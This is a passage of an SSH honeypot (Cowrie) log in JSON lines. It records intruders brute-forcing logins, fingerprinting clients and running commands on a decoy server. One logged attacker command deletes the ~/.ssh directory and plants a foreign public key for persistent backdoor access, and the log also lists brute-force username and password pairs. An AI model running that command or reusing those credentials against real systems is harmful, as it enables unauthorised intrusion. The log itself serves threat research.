{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.404367Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.481037Z","src_ip":"212.227.125.160","session":"e792983d0f3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:59:05.654889Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.655575Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.712785Z","src_ip":"171.243.150.220","session":"997494e90c86"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.784334Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.785266Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":42314,"dst_ip":"1.2.3.4","dst_port":22,"session":"ece4ff106144","protocol":"ssh","message":"New connection: 199.195.253.95:42314 (1.2.3.4:22) [session: ece4ff106144]","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.879464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.885089Z","src_ip":"199.195.253.95","session":"ece4ff106144"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:59:05.994263Z","src_ip":"199.195.253.95","session":"ece4ff106144"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T17:59:06.326136Z","src_ip":"212.227.125.160","session":"d6c4c9c73e86"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T17:59:06.495492Z","src_ip":"199.195.253.95","session":"ece4ff106144"}
{"eventid":"cowrie.session.closed","duration":"43.3","message":"Connection lost after 43.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:06.948657Z","src_ip":"171.243.150.220","session":"997494e90c86"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:07.773748Z","src_ip":"199.195.253.95","session":"ece4ff106144"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:07.850949Z","src_ip":"212.227.125.160","session":"d6c4c9c73e86"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":43326,"dst_ip":"1.2.3.4","dst_port":22,"session":"d32c946ee6c9","protocol":"ssh","message":"New connection: 199.195.253.95:43326 (1.2.3.4:22) [session: d32c946ee6c9]","sensor":"my-vps","timestamp":"2025-08-28T17:59:08.035882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:59:08.041408Z","src_ip":"199.195.253.95","session":"d32c946ee6c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:59:08.321739Z","src_ip":"199.195.253.95","session":"d32c946ee6c9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:59:09.173859Z","src_ip":"199.195.253.95","session":"d32c946ee6c9"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:09.344837Z","src_ip":"199.195.253.95","session":"be4a3134da71"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:09.345723Z","src_ip":"199.195.253.95","session":"d32c946ee6c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-28T17:59:11.999966Z","src_ip":"212.227.125.160","session":"e792983d0f3b"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:13.344874Z","src_ip":"212.227.125.160","session":"e792983d0f3b"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":55292,"dst_ip":"1.2.3.4","dst_port":22,"session":"683daa5d2982","protocol":"ssh","message":"New connection: 171.243.150.185:55292 (1.2.3.4:22) [session: 683daa5d2982]","sensor":"my-vps","timestamp":"2025-08-28T17:59:38.197132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:59:38.219338Z","src_ip":"171.243.150.185","session":"683daa5d2982"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:59:38.394488Z","src_ip":"171.243.150.185","session":"683daa5d2982"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T17:59:39.208917Z","src_ip":"171.243.150.185","session":"683daa5d2982"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:59:40.407796Z","src_ip":"171.243.150.185","session":"683daa5d2982"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42302,"dst_ip":"1.2.3.4","dst_port":22,"session":"52a21fe98601","protocol":"ssh","message":"New connection: 212.227.125.160:42302 (1.2.3.4:22) [session: 52a21fe98601]","sensor":"my-vps","timestamp":"2025-08-28T18:00:12.782165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:00:12.783504Z","src_ip":"212.227.125.160","session":"52a21fe98601"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:00:12.833590Z","src_ip":"212.227.125.160","session":"52a21fe98601"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ\"WSX\u00a3EDC$RFV%TGB^YHN","message":"login attempt [root/!QAZ\"WSX\u00a3EDC$RFV%TGB^YHN] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:00:12.985872Z","src_ip":"212.227.125.160","session":"52a21fe98601"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:00:13.108147Z","src_ip":"212.227.125.160","session":"52a21fe98601"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T18:00:13.108855Z","src_ip":"212.227.125.160","session":"52a21fe98601"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:00:13.160244Z","src_ip":"212.227.125.160","session":"52a21fe98601"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:00:13.161414Z","src_ip":"212.227.125.160","session":"52a21fe98601"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":38760,"dst_ip":"1.2.3.4","dst_port":22,"session":"f56f4aa70d20","protocol":"ssh","message":"New connection: 199.195.253.95:38760 (1.2.3.4:22) [session: f56f4aa70d20]","sensor":"my-vps","timestamp":"2025-08-28T18:00:14.951562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:00:14.960679Z","src_ip":"199.195.253.95","session":"f56f4aa70d20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:00:15.165035Z","src_ip":"199.195.253.95","session":"f56f4aa70d20"}
{"eventid":"cowrie.login.failed","username":"lekaren","password":"lekaren","message":"login attempt [lekaren/lekaren] failed","sensor":"my-vps","timestamp":"2025-08-28T18:00:15.841925Z","src_ip":"199.195.253.95","session":"f56f4aa70d20"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:00:17.057920Z","src_ip":"199.195.253.95","session":"f56f4aa70d20"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":42880,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcf514b38623","protocol":"ssh","message":"New connection: 171.243.150.185:42880 (1.2.3.4:22) [session: fcf514b38623]","sensor":"my-vps","timestamp":"2025-08-28T18:00:17.456804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:00:17.498739Z","src_ip":"171.243.150.185","session":"fcf514b38623"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-c